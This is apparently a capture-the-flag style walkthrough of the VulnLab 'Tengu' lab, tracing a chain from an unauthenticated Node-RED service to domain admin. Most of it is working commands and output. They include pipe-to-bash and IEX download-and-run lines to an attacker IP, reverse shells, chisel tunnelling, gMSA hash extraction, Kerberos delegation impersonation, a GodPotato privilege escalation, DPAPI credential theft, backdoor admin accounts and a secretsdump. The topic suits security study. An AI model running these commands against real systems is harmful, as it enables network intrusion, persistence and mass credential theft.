vulnlab-tengu
a medium chain containing a ubuntu vm , a sql.tengu.vl and a dc.tengu.vl ( all domain djoined)
noderedsh.py -> extracted krb5keytab- read gMSA -> delegate ->login to mssqlclient.py impersonate ->read pass domain admin pass with SharpDPAPI
node-red exploit [initial access]
a web service running named Node-RED on port 1880 which does not require authentication. We make a flow which executes a reverse shell on the target system:
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ python3 noderedsh.py http://10.10.139.247:1880 [+] Node-RED does not require authentication. [+] Establishing RCE link .... > whoami nodered_svc curl http://10.8.2.138/s.sh | bash
.
python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -
.
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442
sh: 0: can't access tty; job control turned off
$ whoami
nodered_svc
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm
export TERM=xterm
nodered_svc@nodered:/opt/nodered/.node-red$
zsh: suspended rlwrap nc -nlvp 443
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ stty raw -echo;fg [1] + continued rlwrap nc -nlvp 443 nodered_svc@nodered:/opt/nodered/.node-red$ nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel nodered_svc@nodered:/tmp$ chmod +x chisel nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ chisel server -p 8000 --reverse 2024/08/14 09:18:49 server: Reverse tunnelling enabled 2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc= 2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000 2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted25>' --local-auth [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:1433 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:445 ... OK MSSQL sql.tengu.vl 1433 SQL [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL) [proxychains] Strict chain ... 127.0.0.1:1080 ... sql.tengu.vl:1433 ... OK MSSQL sql.tengu.vl 1433 SQL [+] nodered_connector:DreamPuppy<redacted>25
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp This is free software with ABSOLUTELY NO WARRANTY For more information type '\warranty' [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.139.246:1433 ... OK 1> show databases; 2> use prod; 3> go Msg 911, Level 16, State 1 Server 'SQL', Line 2 Database 'prod' does not exist. Make sure that the name is entered correctly. 1> select table_name from systable 2> go Msg 208, Level 16, State 1 Server 'SQL', Line 1 Invalid object name 'systable'. 1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES; 2> go -m vert TABLE_CATALOG: Dev TABLE_SCHEMA: dbo TABLE_NAME: Task TABLE_TYPE: BASE TABLE (1 row affected) 1> ... 1> SELECT name FROM master.dbo.sysdatabases; 2> go -m vert name: master name: tempdb name: model name: msdb name: Demo name: Dev (6 rows affected) 1> use Demo; 2> go 1> select * from users; 2> go -m vert ID: NULL Username: t2_m.winters Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147 (1 row affected) 1>
.
crackstation.net
resolves this hash to Tengu123
Checking credentials
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123' SMB dc.tengu.nl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) [proxychains] Strict chain ... 127.0.0.1:1080 ... DC.tengu.vl:389 ... OK LDAP dc.tengu.nl 389 DC [+] tengu.vl\t2_m.winters:Tengu123
Getting krb5.keytab
As this box is domaind joined, we are able to extract the machine ntlm hash from /etc/krb5.keytab by using https://github.com/sosdave/KeyTabExtract
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : TENGU.VL
SERVICE PRINCIPAL : NODERED$/
NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
.
proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip
In Bloodhound we find he machine account NODERED$ has the permission ReadGMSAPassword
We can use netexec to retrieve the NTLM Hash for the account gMSA01$
──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK SMB 224.0.0.1 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False) [proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK LDAPS 224.0.0.1 636 DC [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 LDAPS 224.0.0.1 636 DC [*] Getting GMSA Passwords LDAPS 224.0.0.1 636 DC Account: gMSA01$ NTLM: d4b65861e85773fba2035b31ebcacb37 LDAPS 224.0.0.1 636 DC Account: gMSA02$ NTLM:
we notice that we can delegate permissions as this account
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49 Impacket v0.12.0.dev1 - Copyright 2023 Fortra AccountName AccountType DelegationType DelegationRightsTo ----------- ----------------------------------- ---------------------------------- -------------------------- gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/SQL:1433 gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/sql.tengu.vl:1433 gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/sql.tengu.vl gMSA01$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition MSSQLSvc/sql
In bloodhound we will find a SQL_Admins group which contains two users, next we try to impersonate as one of these users
getting the ticket
.
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:445 ... OK
SMB 224.0.0.1 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.tengu.vl:636 ... OK
LDAPS 224.0.0.1 636 DC [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49
LDAPS 224.0.0.1 636 DC [*] Getting GMSA Passwords
LDAPS 224.0.0.1 636 DC Account: gMSA01$ NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS 224.0.0.1 636 DC Account: gMSA02$ NTLM:
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[*] Impersonating t1_m.winters
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.185.21:88 ... OK
[*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
┌──(puck㉿kali)-[~/vulnlab/tengu]
.
export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
.
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(SQL): Line 1: Changed database context to 'master'. [*] INFO(SQL): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (TENGU\t1_m.winters dbo@master)>
.
SQL (TENGU\t1_m.winters dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"
Catch the shell
┌──(puck㉿kali)-[~/vulnlab/tengu] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\temp> whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled PS C:\temp>
.
godpotato on sql
PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');"
./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');"
[*] CombaseModule: 0x140723188531200
[*] DispatchTable: 0x140723191118152
[*] UseProtseqFunction: 0x140723190413536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435
[*] DCOM obj OXID: 0x3beb0139e85dbe21
[*] DCOM obj OID: 0x3a821b5f15430353
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 908 Token:0x764 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3888
catch the shell as nt-authority system and add ourself as local admin on sql
after 1st findind credsof domain admin TENGU\T0_c.fowler
Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.
PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe
PS C:\temp> ./sharp.exe machinetriage /showall
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.11.3
[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage
[*] Secret : DPAPI_SYSTEM
[*] full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544
[*] m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544
[*] SYSTEM master key cache:
{474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5
{7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7
{1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B
{236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86
[*] Triaging System Credentials
Folder : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
CredFile : 67B6C9FA0475C51A637428875C335AAD
guidMasterKey : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
size : 576
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Local Credential Data
LastWritten : 3/10/2024 2:49:34 PM
TargetName : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
TargetAlias :
Comment :
UserName : TENGU\T0_c.fowler
Credential : Unt<redacted>y25
.
PS C:\temp> net user puck Password123! /add The command completed successfully. PS C:\temp> net user User accounts for \\ ------------------------------------------------------------------------------- Administrator DefaultAccount Guest puck WDAGUtilityAccount The command completed with one or more errors. PS C:\temp> net localgroup administrators puck /add The command completed successfully.
next rdp to sql as puck
proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389
from there start AD users and computers as user , and add a domain-admin puck , then mstsc to dc.tengu.vl
finaly do a hashdump
proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt
Because all Domain Admins are member of the group PROTECTED USERS@TENGU.VL , we can’t rdp in
That was super fun